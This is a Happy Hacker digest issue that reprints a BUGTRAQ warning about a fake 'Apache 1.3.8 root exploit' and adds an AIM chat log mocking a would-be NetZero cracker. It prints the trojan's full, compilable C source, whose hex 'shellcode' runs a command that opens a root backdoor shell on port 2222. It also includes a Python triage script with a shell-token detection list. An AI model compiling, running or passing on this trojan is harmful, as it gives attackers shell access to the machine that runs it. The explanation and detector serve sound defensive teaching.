***********************************************************************
*** Avoiding Trojan Horse Exploits
***********************************************************************

Below, I'm reprinting a posting from Marc Slemko (Apache Software Foundation
member) which appeared this past week on BUGTRAQ. I've withheld his email
address, since I'm not sure he'd want it posted. I have been unable to
contact him, so I don't know whether he minds my reposting this, but since he
already posted it to BUGTRAQ I presume he would encourage the spread of this
information. Part of his point is that there is no security hole in Apache;
more importantly, he warns of the dangers of running the "0day exploits" found
on some "hacker" websites. He writes:

>Below is some code that I have seen a number of times, with some
>very slight variations, over the past few months. I have no idea
>how many people have been tricked by it. This does not exploit
>any hole in Apache, period. As a simple inspection shows you, it
>will run:
>
>echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h
>
>on the local machine. If you try this "exploit" as root, it will
>certainly try to compromise your machine. But not remotely and it
>is nothing to do with Apache or any bug other than the "bug" of
>admins running random code as root.
>
>I know this should be too obvious to have to say and should be no news to
>anyone here, but: do not run random supposed exploits as root on your box
>without knowing what they do. Do not even run them as a non-root UID
>unless it is a throwaway UID (better yet, a throw away box) and you have
>examined what the program does. This obviously applies to things posted
>to bugtraq but, even more so, to "secret" exploits you may find or be
>sent.
>
>Again: the below code has nothing to do with any supposed security hole
>in Apache.
>
>To top it all off, in this case there is the fact that there was never
>an Apache 1.3.8 released to exploit. Apache went from 1.3.6 to
>1.3.9.
>
>I am posting this to chop off any rumors of a "secret" Apache root exploit
>at the knees as well as to give people an example of why they shouldn't do
>silly things.
>
>Thanks.

He then posts the code. I'm reprinting it here, and then I'll write a little
about how it works.

/* remote apache 1.3.8 root exploit (linux) */
/* Reprinted as a warning: this is a trojan horse, not an exploit. The
   comments are added for this reprint; the only changes to the code are the
   #includes it was missing, the NULL terminator on execl() and indentation,
   so that it compiles cleanly. Do NOT run it outside a throwaway box. */

#include <stdio.h>
#include <stdlib.h>      /* malloc(), exit() */
#include <string.h>      /* memcpy(), strlen() */
#include <strings.h>     /* bzero(), bcopy() */
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>    /* wait() */
#include <netinet/in.h>
#include <arpa/inet.h>

/* Not machine code at all. These are the ASCII bytes of the shell command
 *   echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h
 * which writes an inetd entry to /tmp/h and starts a second inetd from it,
 * offering an interactive shell (as root, if you ran this as root) to anyone
 * who connects to TCP port 2222 on the machine that runs this program. */
char shellcode[] = \
"\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72"
"\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74"
"\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f"
"\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e"
"\x65\x74\x64\x20\x2f\x74\x6d\x70\x2f\x68";

/* Window dressing: NOP, OFFSET and ADDR are never used anywhere below. */
#define NOP 0x90
#define BSIZE 256
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000

int
main(int argc, char *argv[])
{
    char *buffer;
    int s;
    struct hostent *hp;
    struct sockaddr_in sin;

    if (argc != 2) {
        printf("%s <target>\n", argv[0]);
        exit(1);
    }
    /* The buffer is never filled with NOPs; apart from the "shellcode" copied
       into it, it holds whatever malloc() handed back. */
    buffer = (char *) malloc(BSIZE + ASIZE + 100);
    if (buffer == NULL) {
        printf("Not enough memory\n");
        exit(1);
    }
    memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
           strlen(shellcode));
    buffer[BSIZE + ASIZE] = ';';
    buffer[BSIZE + ASIZE + 1] = '\0';
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("no such server\n");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf("Can't open socket\n");
        exit(1);
    }
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("Connection refused\n");
        exit(1);
    }
    printf("sending exploit code...\n");
    /* send() returns the number of bytes sent (or -1), so "!= 1" is true for
       practically any outcome: "successful" is printed no matter what the
       server did. strlen(buffer) measures uninitialised memory, too. */
    if (send(s, buffer, strlen(buffer), 0) != 1)
        printf("exploit was successful!\n");
    else
        printf("sorry, this site isn't vulnerable\n");
    printf("waiting for shell.....\n");
    /* The real payload: the "shellcode" is handed to /bin/sh -c and run on
       the LOCAL machine, with the privileges of whoever started this program.
       Nothing about it ever touches the "target". */
    if (fork() == 0)
        execl("/bin/sh", "sh", "-c", shellcode, (char *)NULL);
    else
        wait(NULL);
    while (1) { /* shell */ }   /* spins forever to look like it's waiting */
}

This code sure looks legit. It has plausible headers, error messages that
look appropriate, and even a variable named "shellcode" that seems to contain
some really evil hax0r exploit. Well... it does, just not the kind the first
line promises. The "shellcode" is not a string sent to crash an Apache
server... far from it. It is nothing but hex-escaped ASCII (that's not
encryption; it's just the text written out byte by byte as \xHH escapes so
you can't read it at a glance) that hands the compiler this shell command:

echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/h

Now look at the bottom of main(): that string is passed to
execl("/bin/sh", "sh", "-c", shellcode, ...), so it runs on your machine, as
you, whatever the "target" does. The command appends an inetd entry to
/tmp/h and starts a second inetd from it, so anyone who can reach TCP port
2222 on your box gets an interactive shell, as root if you ran the "exploit"
as root (which is exactly what the first line invites you to do).

Of course, this is not what you'd want run on your system. How do you avoid
such a thing? First, run it only on a throwaway machine, under a throwaway
account. Second, decode every hex or octal string you see in an exploit and
look at what it spells out as ASCII text: real shellcode is machine code and
mostly unprintable, while a payload that reads as a complete shell command is
one that will be run, not sent. Third, find where the "shellcode" is actually
used: if it ends up in system(), popen() or an exec*() call instead of in a
buffer that goes out a socket, it's a trojan. And never trust any site with
the phrase HPVAC on it :).
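Here is a small triage script that does those checks mechanically. It is an
added example for this digest, not code from Marc's posting or from the
trojan's author: it pulls every `char name[] = "..."` array out of a C source
file, decodes the \x and octal escapes to bytes, reports whether the result is
readable text containing shell syntax, and looks for the array being handed
to a local exec-style call. The embedded sample source is a constructed
condensation of the trojan above (its "shellcode" array and the execl() line)
plus, for contrast, a constructed array holding a machine-code-style payload;
the token list, the verdict wording and the function names are my own
choices.

```python
import re
import string

# Constructed sample (added for this example): a condensation of the trojan
# reprinted above -- its "shellcode" array and the execl() line -- plus a
# second array holding a machine-code-style payload for contrast.
SAMPLE_C_SOURCE = r'''
char shellcode[] = \
"\x65\x63\x68\x6f\x20\x22\x32\x32\x32\x32\x20\x73\x74\x72"
"\x65\x61\x6d\x20\x74\x63\x70\x20\x6e\x6f\x77\x61\x69\x74"
"\x20\x72\x6f\x6f\x74\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x73\x68\x20\x2d\x69\x22\x3e\x3e\x20\x2f\x74\x6d\x70\x2f"
"\x68\x3b\x2f\x75\x73\x72\x2f\x73\x62\x69\x6e\x2f\x69\x6e"
"\x65\x74\x64\x20\x2f\x74\x6d\x70\x2f\x68";
char realcode[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
    memcpy(&buffer[BSIZE - strlen(realcode)], realcode, strlen(realcode));
    if (fork() == 0)
        execl("/bin/sh", "sh", "-c", shellcode, 0);
'''

# char NAME[] = "..." "..." ;   (optional backslash line continuation after '=')
_ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*\\?\s*((?:"(?:[^"\\\n]|\\.)*"\s*)+);')
_PIECE_RE = re.compile(r'"((?:[^"\\\n]|\\.)*)"')
_HEX_RE, _OCT_RE = re.compile(r"[0-9A-Fa-f]+"), re.compile(r"[0-7]{1,3}")
_SIMPLE = {"n": 10, "t": 9, "r": 13, "a": 7, "b": 8, "f": 12, "v": 11,
           "\\": 92, '"': 34, "'": 39, "?": 63}
SHELL_TOKENS = ("/bin/sh", "/bin/bash", "inetd", "echo ", ">>", "| sh",
                "/tmp/", "/etc/passwd", "/etc/shadow", "rm -rf", "chmod ")
EXEC_FUNCS = ("system", "popen", "execl", "execlp", "execle", "execv", "execvp", "execve")


def decode_c_string(body):
    """Decode the text between the quotes of a C string literal into bytes."""
    out, i = bytearray(), 0
    while i < len(body):
        if body[i] != "\\":
            out.append(ord(body[i]))            # plain ASCII character
            i += 1
            continue
        nxt, m = body[i + 1:i + 2], None
        if nxt == "x":                          # \xHH: C takes every hex digit that follows
            m = _HEX_RE.match(body, i + 2)
            value = int(m.group(), 16) if m else -1
        elif nxt and nxt in "01234567":         # \NNN: one to three octal digits
            m = _OCT_RE.match(body, i + 1)
            value = int(m.group(), 8)
        elif nxt in _SIMPLE:
            value = _SIMPLE[nxt]
        else:
            raise ValueError("unknown escape at offset %d" % i)
        if not 0 <= value <= 0xFF:
            raise ValueError("bad or over-wide escape at offset %d" % i)
        out.append(value)
        i = m.end() if m else i + 2
    return bytes(out)


def local_exec_calls(src, name):
    """Exec-style calls whose argument list names the array: the trojan tell."""
    found = []
    for fn in EXEC_FUNCS:
        for m in re.finditer(r"\b%s\s*\(([^;]*)\)" % fn, src):
            if re.search(r"\b%s\b" % re.escape(name), m.group(1)):
                found.append(fn)
    return found


def assess(name, data, src):
    """Classify one decoded payload: readable shell command vs. opaque bytes."""
    text = data.decode("latin-1")
    ratio = sum(c in string.printable for c in text) / len(text) if text else 0.0
    tokens = [t for t in SHELL_TOKENS if t in text]
    execs = local_exec_calls(src, name)
    if execs:
        verdict = "TROJAN: run on the local machine via %s()" % "/".join(execs)
    elif ratio == 1.0 and tokens:
        verdict = "SUSPICIOUS: spells out a shell command, not machine code"
    else:
        verdict = "opaque bytes: disassemble before trusting it"
    return {"name": name, "decoded": text, "printable_ratio": ratio,
            "shell_tokens": tokens, "exec_calls": execs, "verdict": verdict}


def triage(src):
    """Decode and assess every char array found in a C source string."""
    results = {}
    for m in _ARRAY_RE.finditer(src):
        name, literal = m.group(1), m.group(2)
        results[name] = assess(name, decode_c_string("".join(_PIECE_RE.findall(literal))), src)
    return results


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_C_SOURCE
    for r in triage(source).values():
        print("%s: %s\n  decodes to: %r" % (r["name"], r["verdict"], r["decoded"]))
```

Run it with the path of a downloaded "exploit" as the argument (or with no
argument to see it on the sample). The printable-ratio check on its own is
weak, since genuine shellcode often embeds strings like /bin//sh; the strong
signal is the last check, an array that reaches system(), popen() or exec*()
instead of a socket, which is why it outranks the others in the verdict.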

***********************************************************************
*** Quasi-Humorous Bonus
***********************************************************************

I know this isn't the time or the place, but I just have to stick this in as
a little "bonus". The following is a transcript of an AOL Instant Messenger
conversation I had with someone who IM'ed me (probably using the "find a
buddy by interest" option: I list computers as a topic I'll chat about). I've
obscured both names to protect the stupid (and to avoid giving out my own
address). My comments are in <angle brackets>. This transcript was made from
a conversation using TAC, the Tcl/Tk clone of Instant Messenger.

<He initiates the conversation>
LowblFUBAR1: hey man are u computer literate
MikeFUBAR: I beg your pardon?
LowblFUBAR1: do u know alot about computers
MikeFUBAR: yes... do you know a lot about etiquette?
<Don't ever try and be rude to me, then ask for a favor. You want something,
be nice.>
LowblFUBAR1: sure
LowblFUBAR1: dont take it to heart bro
MikeFUBAR: I didn't
<I wish I had one of those :) things for "rolling my eyes">
LowblFUBAR1: do u know about cracks for netzero
MikeFUBAR: did you read the EULA?
<End User License Agreement-- that big bunch of text that everyone just
clicks "I Agree" and ignores. It says things like reverse engineering is
prohibited, no unauthorized duplication, and no disabling the ads>
LowblFUBAR1: naw
LowblFUBAR1: where can I?
MikeFUBAR: it tells you where you can get cracks
LowblFUBAR1: I am running win2k and none seem to work right
LowblFUBAR1: where can i read that
MikeFUBAR: do you know what it is? Or are you some 31337 l@m3r?
LowblFUBAR1: naw man
LowblFUBAR1: school me
MikeFUBAR: no can do, criminal-wannabe-dude... did you read my profile?
LowblFUBAR1: not even
LowblFUBAR1: don't go there
MikeFUBAR: you should, you might find the answer there
[My profile says: I'm currently working for the FBI computer crimes unit
part-time, and going to school full-time.]
LowblFUBAR1: yea right
LowblFUBAR1: quick typing
MikeFUBAR: You do know, BTW, that attempting to defeat the ads is a crime
LowblFUBAR1: who said i was going to use it i just said do u know where i
can find one for educational purposes
<I love that line>
MikeFUBAR: do you know anything at all about network programming? I.e., are
you aware of what 'netstat' does?
LowblFUBAR1: yes
MikeFUBAR: excellent
<I was hoping for more of a response, so I could tell him I had his IP
address. I know, AOL is server based, and the only connection that'll show
up is to the AOL server... but I don't think he would have known that>
LowblFUBAR1: hey man thanks for the little info that u gave me catch u
around some time and we can pick each others brain
<Does that mean he's going to be searching the web for EULA... hehe. And you
know what they say about picking your friends...>
MikeFUBAR: no problem, stay legal (or at least don't get caught :) )
LowblFUBAR1: thanks
LowblFUBAR1: later bro
<I sent this a few minutes later, since he should be able to read about
himself :)>
MikeFUBAR: BTW, I meant to ask you, do you know who CPM and/or JP are?
<I figured anyone who's ever read a so-called "hackers page" knows that the
names Meinel and Vranesevich are automatically taboo, but maybe he might not
even know enough to recognize their initials :) >
LowblFUBAR1: NAW
<I was right>
MikeFUBAR: ok... never mind then
LowblFUBAR1: hey got any cool web site for me
MikeFUBAR: sorry man
LowblFUBAR1: why u ask
MikeFUBAR: just curious...
<And if he read HHUD, I would have told him to look for his name in the next
issue>
<about 30 minutes later>
LowblFUBAR1: hey bud
MikeFUBAR: yes?
LowblFUBAR1: have u heard of a compiler?
MikeFUBAR: I think I might've stumbled across that term once or twice in my
life....
LowblFUBAR1: hmmm......
LowblFUBAR1: interisting
<Hmm... seems like not only can he not spell, but sarcasm is _way_ over his
head>
MikeFUBAR: glad you think so
MikeFUBAR: was there a point to that last inquiry?
LowblFUBAR1: just a question
LowblFUBAR1: pickin at that brain again
<This guy has no life>
LowblFUBAR1: what about a c: file
LowblFUBAR1: cant figure that out
MikeFUBAR: <shrug> read your manual, it contains many useful tidbits of
information
<I'm assuming he means a .c source code file>
LowblFUBAR1: naw not that kind of c: file
LowblFUBAR1: nevermind u never head of it
<If I've said it once, I've said it a thousand times: flattery will get you
everywhere.>
MikeFUBAR: to what kind do you refer?
LowblFUBAR1: part of a compiler
MikeFUBAR: you mean a .c file?
LowblFUBAR1: there u go miss type my bad
<I think I know what a source code file is... yeah...>
MikeFUBAR: Like I said, RTFM, it'll teach you about .c, .cpp, .h, and all
the various files you need to compile your latest 0day evil haxor exploit...
it'll even make the flaming skulls appear on your screen....
LowblFUBAR1: ha ha
MikeFUBAR: that was not a joke
LowblFUBAR1: not even
LowblFUBAR1: i am seriouly learning for this class
<Not English class, I presume. I love it when people who have no ability to
lie try to become social engineers. Sheesh, these are the kind of people who
_should_ be dumpster diving.>
LowblFUBAR1: wont bother u anymore bro
LowblFUBAR1: later
MikeFUBAR: uh huh. Well... ask your teacher. Or RTFM... or both... or come
up with a _clever_ excuse.... adios
LowblFUBAR1: whateva man
<Thanks for the entertainment! Should anyone wish to know more about this
individual, his profile states: "Hello to all my sexy ladies out there. I
love to chat so if u want I m me and we canm[sic] talk about anything u
want. /Bye ladies/Blaze" I just hope none of you "sexy ladies" who want to
talk to this fine specimen plan to discuss computers with him...>

.... ._ .__. .__. _.__ .... ._ _._. _._ . ._. _.. .. __. . ... _

This is a list devoted to *legal* hacking! If anyone plans to use any
information in this Digest or at our Web site to commit crime, go away! We
like to put computer criminals behind bars where they belong!

 © 2013 Happy Hacker All rights reserved.